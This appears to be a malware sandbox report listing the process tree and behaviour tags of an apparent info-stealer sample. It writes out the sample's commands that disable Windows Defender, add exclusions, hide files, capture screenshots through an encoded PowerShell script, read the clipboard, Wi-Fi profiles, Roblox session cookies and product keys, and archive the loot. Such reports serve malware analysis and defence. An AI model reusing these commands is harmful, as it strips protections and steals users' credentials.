PID 2244 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 4996 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4996 wrote to memory of 664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2076 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2076 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2244 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe
PID 2244 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe

"C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe"

C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe

"C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please download redist_68 then try again.', 0, 'Error.', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please download redist_68 then try again.', 0, 'Error.', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌‎.scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌‎.scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fzupxqpe\fzupxqpe.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C4D.tmp" "c:\Users\Admin\AppData\Local\Temp\fzupxqpe\CSCCB5053CCBF4E41E0A6A54F7BBD1DBC3.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\RCJ5a.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI39762\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI39762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\RCJ5a.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaf550ab58,0x7ffaf550ab68,0x7ffaf550ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3524 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

